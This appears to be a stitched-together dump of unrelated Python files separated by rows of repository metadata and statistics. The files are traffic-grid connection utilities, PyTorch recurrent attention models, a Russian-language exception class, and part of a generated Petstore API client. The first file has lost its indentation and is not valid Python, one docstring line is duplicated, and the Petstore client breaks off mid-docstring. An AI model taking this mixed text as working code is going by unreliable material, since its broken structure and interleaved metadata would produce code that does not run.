# ============ UTILS ============
# ===============================
def specify_connections(self, net_params):
"""Build out connections at each inner node.
"""
con_dict = {}
# specify certain connections for given edge pair
# In form of {"from" : edge id,
# "to" : edge id, \
# "fromLane":(sub-edge of a certain edge and it is by default 0) : {number between 0 to self.lanes - 1},
# "toLane":{number between 0 to self.lanes - 1}}
def new_con(from_id, to_id):
conn = []
for lane1 in range(self.vertical_lanes):
for lane2 in range(self.vertical_lanes):
conn.append({
"from": from_id,
"to": to_id,
"fromLane": str(lane1),
"toLane": str(lane2),
})
return conn
# build connections at each inner node
for area_idx in range(self.col_idx_num * self.row_idx_num):
for node_id in range(self.row_num * self.col_num):
conn = []
i = node_id // self.col_num
j = node_id % self.col_num
if i + 1 < self.row_num:
top_edge_id = ["right{}_{}_{}".format(i + 1, j, area_idx), "left{}_{}_{}".format(i + 1, j, area_idx)]
else:
top_edge_id = ["out_right{}_{}".format(j, area_idx), "in_left{}_{}".format(j, area_idx)]
if i > 0:
bot_edge_id = ["left{}_{}_{}".format(i, j, area_idx), "right{}_{}_{}".format(i, j, area_idx)]
else:
bot_edge_id = ["out_left{}_{}".format(j, area_idx), "in_right{}_{}".format(j, area_idx)]
if j > 0:
left_edge_id = ["top{}_{}_{}".format(i, j, area_idx), "bot{}_{}_{}".format(i, j, area_idx)]
else:
left_edge_id = ["out_top{}_{}".format(i, area_idx), "in_bot{}_{}".format(i, area_idx)]
if j + 1 < self.col_num:
right_edge_id = ["bot{}_{}_{}".format(i, j + 1, area_idx), "top{}_{}_{}".format(i, j + 1, area_idx)]
else:
right_edge_id = ["out_bot{}_{}".format(i, area_idx), "in_top{}_{}".format(i, area_idx)]
assert self.vertical_lanes == self.horizontal_lanes
for i in [top_edge_id, bot_edge_id, left_edge_id, right_edge_id]:
for j in [top_edge_id, bot_edge_id, left_edge_id, right_edge_id]:
conn += new_con(i[1], j[0])
node_name = "center{}_{}".format(node_id, area_idx)
con_dict[node_name] = conn
for row in range(self.row_num * self.row_idx_num):
for col in range(1, self.col_idx_num):
i = row % self.row_num
j = row // self.row_num
conn = []
node_name = "col_{}_{}_top".format(row, col)
conn += new_con("out_top{}_{}".format(i, j * self.col_idx_num + col), "in_top{}_{}".format(i, j * self.col_idx_num + col - 1))
con_dict[node_name] = conn
conn = []
node_name = "col_{}_{}_bot".format(row, col)
conn += new_con("out_bot{}_{}".format(i, j * self.col_idx_num + col - 1), "in_bot{}_{}".format(i, j * self.col_idx_num + col))
con_dict[node_name] = conn
for col in range(self.col_num * self.col_idx_num):
for row in range(1, self.row_idx_num):
i = col % self.col_num
j = col // self.col_num
conn = []
node_name = "row_{}_{}_left".format(col, row)
conn += new_con("out_left{}_{}".format(i, row * self.col_idx_num + j), "in_left{}_{}".format(i, row * self.col_idx_num + j - self.col_idx_num))
con_dict[node_name] = conn
conn = []
node_name = "row_{}_{}_right".format(col, row)
conn += new_con("out_right{}_{}".format(i, row * self.col_idx_num + j - self.col_idx_num), "in_right{}_{}".format(i, row * self.col_idx_num + j))
con_dict[node_name] = conn
return con_dict
# TODO necessary?
def specify_edge_starts(self):
"""See parent class."""
length = 0
edgestarts = []
for edge in self.edges:
# the current edge starts where the last edge ended
edgestarts.append((edge['id'], length))
# increment the total length of the network with the length of the
# current edge
length += float(edge['length'])
return edgestarts
@property
def node_mapping(self):
"""Map nodes to edges.
Returns a list of pairs (node, connected edges) of all inner nodes
Returns a list of pairs (node, connected edges) of all inner nodes
and for each of them, the 4 edges that leave this node.
The nodes are listed in alphabetical order, and within that, edges are
listed in order: [bot, right, top, left].
"""
mapping = {}
for area_idx in range(self.col_idx_num * self.row_idx_num):
for node_id in range(self.row_num * self.col_num):
node_name = "center{}_{}".format(node_id, area_idx)
i = node_id // self.col_num
j = node_id % self.col_num
top_edge_id = "left{}_{}_{}".format(i + 1, j, area_idx) if i + 1 < self.row_num else None
bot_edge_id = "right{}_{}_{}".format(i, j, area_idx) if i > 0 else None
left_edge_id = "bot{}_{}_{}".format(i, j, area_idx) if j > 0 else None
right_edge_id = "top{}_{}_{}".format(i, j + 1, area_idx) if j + 1 < self.col_num else None
mapping[node_name] = [left_edge_id, bot_edge_id, right_edge_id, top_edge_id]
return sorted(mapping.items(), key=lambda x: x[0])
| 45.276434 | 180 | 0.514722 | 8,276 | 65,515 | 3.811382 | 0.037095 | 0.044891 | 0.028215 | 0.024855 | 0.887202 | 0.845671 | 0.811052 | 0.752116 | 0.729258 | 0.702945 | 0 | 0.013109 | 0.364237 | 65,515 | 1,446 | 181 | 45.307746 | 0.74419 | 0.212928 | 0 | 0.643098 | 0 | 0 | 0.104796 | 0 | 0 | 0 | 0 | 0.001383 | 0.008979 | 1 | 0.035915 | false | 0 | 0.005612 | 0.002245 | 0.078563 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a96e35b53453218901d95213757f5e94b4b042b | 7,354 | py | Python | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | model.py | bennzo/DT-RAM-PyTorch | b364662ab7650ffd26cf129673752521e004b13a | [
"MIT"
] | null | null | null | import torch.nn as nn
import modules
class RecurrentAttention(nn.Module):
"""A Recurrent Model of Visual Attention (RAM) [1].
RAM is a recurrent neural network that processes
inputs sequentially, attending to different locations
within the image one at a time, and incrementally
combining information from these fixations to build
up a dynamic internal representation of the image.
References:
[1]: Minh et. al., https://arxiv.org/abs/1406.6247
"""
def __init__(
self, g, k, s, c, h_g, h_l, std, hidden_size, num_classes,
):
"""Constructor.
Args:
g: size of the square patches in the glimpses extracted by the retina.
k: number of patches to extract per glimpse.
s: scaling factor that controls the size of successive patches.
c: number of channels in each image.
h_g: hidden layer size of the fc layer for `phi`.
h_l: hidden layer size of the fc layer for `l`.
std: standard deviation of the Gaussian policy.
hidden_size: hidden size of the rnn.
num_classes: number of classes in the dataset.
num_glimpses: number of glimpses to take per image,
i.e. number of BPTT steps.
"""
super().__init__()
self.std = std
self.sensor = modules.GlimpseNetwork(h_g, h_l, g, k, s, c)
self.rnn = modules.CoreNetwork(hidden_size, hidden_size)
self.locator = modules.LocationNetwork(hidden_size, 2, std)
self.classifier = modules.ActionNetwork(hidden_size, num_classes)
self.baseliner = modules.BaselineNetwork(hidden_size, 1)
def forward(self, x, l_t_prev, h_t_prev, last=False):
"""Run RAM for one timestep on a minibatch of images.
Args:
x: a 4D Tensor of shape (B, H, W, C). The minibatch
of images.
l_t_prev: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the previous
timestep `t-1`.
h_t_prev: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the previous timestep `t-1`.
last: a bool indicating whether this is the last timestep.
If True, the action network returns an output probability
vector over the classes and the baseline `b_t` for the
current timestep `t`. Else, the core network returns the
hidden state vector for the next timestep `t+1` and the
location vector for the next timestep `t+1`.
Returns:
h_t: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the current timestep `t`.
mu: a 2D tensor of shape (B, 2). The mean that parametrizes
the Gaussian policy.
l_t: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the
current timestep `t`.
b_t: a vector of length (B,). The baseline for the
current time step `t`.
log_probas: a 2D tensor of shape (B, num_classes). The
output log probability vector over the classes.
log_pi: a vector of length (B,).
"""
g_t = self.sensor(x, l_t_prev)
h_t = self.rnn(g_t, h_t_prev)
log_pi, l_t = self.locator(h_t)
b_t = self.baseliner(h_t).squeeze()
if last:
log_probas = self.classifier(h_t)
return h_t, l_t, b_t, log_probas, log_pi
return h_t, l_t, b_t, log_pi
class RecurrentAttentionDynamic(nn.Module):
"""A Recurrent Model of Visual Attention (RAM) [1].
Similar implementation to the `RecurrentAttention` class
with the addition of a stopping network in case of a confident
classification. also known as DT-RAM[2].
References:
[1]: Minh et. al., https://arxiv.org/abs/1406.6247
[2]: Li et. al., https://arxiv.org/abs/1703.10332
"""
def __init__(
self, g, k, s, c, h_g, h_l, std, hidden_size, num_classes,
):
"""Constructor.
Args:
g: size of the square patches in the glimpses extracted by the retina.
k: number of patches to extract per glimpse.
s: scaling factor that controls the size of successive patches.
c: number of channels in each image.
h_g: hidden layer size of the fc layer for `phi`.
h_l: hidden layer size of the fc layer for `l`.
std: standard deviation of the Gaussian policy.
hidden_size: hidden size of the rnn.
num_classes: number of classes in the dataset.
num_glimpses: number of glimpses to take per image,
i.e. number of BPTT steps.
"""
super().__init__()
self.std = std
self.sensor = modules.GlimpseNetwork(h_g, h_l, g, k, s, c)
self.rnn = modules.CoreNetwork(hidden_size, hidden_size)
self.locator = modules.LocationNetwork(hidden_size, 2, std)
self.classifier = modules.ActionNetwork(hidden_size, num_classes)
self.baseliner = modules.BaselineNetwork(hidden_size, 1)
self.stopper = modules.StoppingNetwork(hidden_size, 1)
def forward(self, x, l_t_prev, h_t_prev, last=False, use_stop=False):
"""Run RAM for one timestep on a minibatch of images.
Args:
x: a 4D Tensor of shape (B, H, W, C). The minibatch
of images.
l_t_prev: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the previous
timestep `t-1`.
h_t_prev: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the previous timestep `t-1`.
last: a bool indicating whether this is the last timestep.
If True, the action network returns an output probability
vector over the classes and the baseline `b_t` for the
current timestep `t`. Else, the core network returns the
hidden state vector for the next timestep `t+1` and the
location vector for the next timestep `t+1`.
Returns:
h_t: a 2D tensor of shape (B, hidden_size). The hidden
state vector for the current timestep `t`.
mu: a 2D tensor of shape (B, 2). The mean that parametrizes
the Gaussian policy.
l_t: a 2D tensor of shape (B, 2). The location vector
containing the glimpse coordinates [x, y] for the
current timestep `t`.
b_t: a vector of length (B,). The baseline for the
current time step `t`.
log_probas: a 2D tensor of shape (B, num_classes). The
output log probability vector over the classes.
log_pi: a vector of length (B,).
"""
g_t = self.sensor(x, l_t_prev)
h_t = self.rnn(g_t, h_t_prev)
log_pi_loc, l_t = self.locator(h_t)
log_pi_stop, a_t = self.stopper(h_t)
log_prob_class = self.classifier(h_t)
b_t = self.baseliner(h_t).squeeze()
return h_t, l_t, b_t, log_prob_class, log_pi_loc, a_t.squeeze(), log_pi_stop.squeeze()
| 42.022857 | 94 | 0.607289 | 1,069 | 7,354 | 4.047708 | 0.173994 | 0.048532 | 0.042061 | 0.045297 | 0.856714 | 0.856714 | 0.845621 | 0.845621 | 0.835221 | 0.823203 | 0 | 0.012736 | 0.316698 | 7,354 | 174 | 95 | 42.264368 | 0.848358 | 0.624422 | 0 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.047619 | 0 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
76f93605276afc5f9ee3da8aaed75e76c52d2b5b | 230 | py | Python | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | my_package/repo/client_errors.py | OOPSA45/Python-learn- | b38ad51c1c45c46b80e4da3d328cc841388ca21a | [
"Apache-2.0"
] | null | null | null | class NoneContactError(Exception):
"""Не найден контакт"""
def __init__(self, username):
self.username = username
def __str__(self):
return 'Контакт с именем {} не найден'.format(self.username) | 28.75 | 68 | 0.643478 | 25 | 230 | 5.6 | 0.6 | 0.257143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243478 | 230 | 8 | 68 | 28.75 | 0.804598 | 0.073913 | 0 | 0 | 0 | 0 | 0.144279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
0a018863df4997ffbadf33ade2e1e4c588ee30ed | 42,426 | py | Python | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | samples/openapi3/client/petstore/python-experimental/petstore_api/api/pet_api.py | denyo/openapi-generator | 468d80be4beff74de33a2dd1d533f855030038d5 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from petstore_api.api_client import ApiClient, Endpoint
from petstore_api.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from petstore_api.model import pet
from petstore_api.model import api_response
class PetApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __add_pet(
self,
pet_pet,
**kwargs
):
"""Add a new pet to the store # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_pet(pet_pet, async_req=True)
>>> result = thread.get()
Args:
pet_pet (pet.Pet): Pet object that needs to be added to the store
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_pet'] = \
pet_pet
return self.call_with_http_info(**kwargs)
self.add_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet',
'operation_id': 'add_pet',
'http_method': 'POST',
'servers': [
{
'url': "http://petstore.swagger.io/v2",
'description': "No description provided",
},
{
'url': "http://path-server-test.petstore.local/v2",
'description': "No description provided",
},
]
},
params_map={
'all': [
'pet_pet',
],
'required': [
'pet_pet',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_pet':
(pet.Pet,),
},
'attribute_map': {
},
'location_map': {
'pet_pet': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client,
callable=__add_pet
)
def __delete_pet(
self,
pet_id,
**kwargs
):
"""Deletes a pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_pet(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): Pet id to delete
Keyword Args:
api_key (str): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.delete_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'delete_pet',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'pet_id',
'api_key',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'api_key':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'api_key': 'api_key',
},
'location_map': {
'pet_id': 'path',
'api_key': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__delete_pet
)
def __find_pets_by_status(
self,
status,
**kwargs
):
"""Finds Pets by status # noqa: E501
Multiple status values can be provided with comma separated strings # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_pets_by_status(status, async_req=True)
>>> result = thread.get()
Args:
status ([str]): Status values that need to be considered for filter
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[pet.Pet]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['status'] = \
status
return self.call_with_http_info(**kwargs)
self.find_pets_by_status = Endpoint(
settings={
'response_type': ([pet.Pet],),
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet/findByStatus',
'operation_id': 'find_pets_by_status',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'status',
],
'required': [
'status',
],
'nullable': [
],
'enum': [
'status',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('status',): {
"AVAILABLE": "available",
"PENDING": "pending",
"SOLD": "sold"
},
},
'openapi_types': {
'status':
([str],),
},
'attribute_map': {
'status': 'status',
},
'location_map': {
'status': 'query',
},
'collection_format_map': {
'status': 'csv',
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__find_pets_by_status
)
def __find_pets_by_tags(
self,
tags,
**kwargs
):
"""Finds Pets by tags # noqa: E501
Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_pets_by_tags(tags, async_req=True)
>>> result = thread.get()
Args:
tags ([str]): Tags to filter by
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[pet.Pet]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['tags'] = \
tags
return self.call_with_http_info(**kwargs)
self.find_pets_by_tags = Endpoint(
settings={
'response_type': ([pet.Pet],),
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet/findByTags',
'operation_id': 'find_pets_by_tags',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'tags',
],
'required': [
'tags',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'tags':
([str],),
},
'attribute_map': {
'tags': 'tags',
},
'location_map': {
'tags': 'query',
},
'collection_format_map': {
'tags': 'csv',
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__find_pets_by_tags
)
def __get_pet_by_id(
self,
pet_id,
**kwargs
):
"""Find pet by ID # noqa: E501
Returns a single pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_pet_by_id(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet to return
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
pet.Pet
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.get_pet_by_id = Endpoint(
settings={
'response_type': (pet.Pet,),
'auth': [
'api_key'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'get_pet_by_id',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'pet_id',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
},
'attribute_map': {
'pet_id': 'petId',
},
'location_map': {
'pet_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/xml',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__get_pet_by_id
)
def __update_pet(
self,
pet_pet,
**kwargs
):
"""Update an existing pet # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pet(pet_pet, async_req=True)
>>> result = thread.get()
Args:
pet_pet (pet.Pet): Pet object that needs to be added to the store
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_pet'] = \
pet_pet
return self.call_with_http_info(**kwargs)
self.update_pet = Endpoint(
settings={
'response_type': None,
'auth': [
'http_signature_test',
'petstore_auth'
],
'endpoint_path': '/pet',
'operation_id': 'update_pet',
'http_method': 'PUT',
'servers': [
{
'url': "http://petstore.swagger.io/v2",
'description': "No description provided",
},
{
'url': "http://path-server-test.petstore.local/v2",
'description': "No description provided",
},
]
},
params_map={
'all': [
'pet_pet',
],
'required': [
'pet_pet',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_pet':
(pet.Pet,),
},
'attribute_map': {
},
'location_map': {
'pet_pet': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/json',
'application/xml'
]
},
api_client=api_client,
callable=__update_pet
)
def __update_pet_with_form(
self,
pet_id,
**kwargs
):
"""Updates a pet in the store with form data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_pet_with_form(pet_id, async_req=True)
>>> result = thread.get()
Args:
pet_id (int): ID of pet that needs to be updated
Keyword Args:
name (str): Updated name of the pet. [optional]
status (str): Updated status of the pet. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['pet_id'] = \
pet_id
return self.call_with_http_info(**kwargs)
self.update_pet_with_form = Endpoint(
settings={
'response_type': None,
'auth': [
'petstore_auth'
],
'endpoint_path': '/pet/{petId}',
'operation_id': 'update_pet_with_form',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'pet_id',
'name',
'status',
],
'required': [
'pet_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'pet_id':
(int,),
'name':
(str,),
'status':
(str,),
},
'attribute_map': {
'pet_id': 'petId',
'name': 'name',
'status': 'status',
},
'location_map': {
'pet_id': 'path',
'name': 'form',
'status': 'form',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [
'application/x-www-form-urlencoded'
]
},
api_client=api_client,
callable=__update_pet_with_form
)
def __upload_file(
self,
pet_id,
**kwargs
):
"""uploads an image # noqa: E501
This method makes a synchronous HTTP request by default. To make an
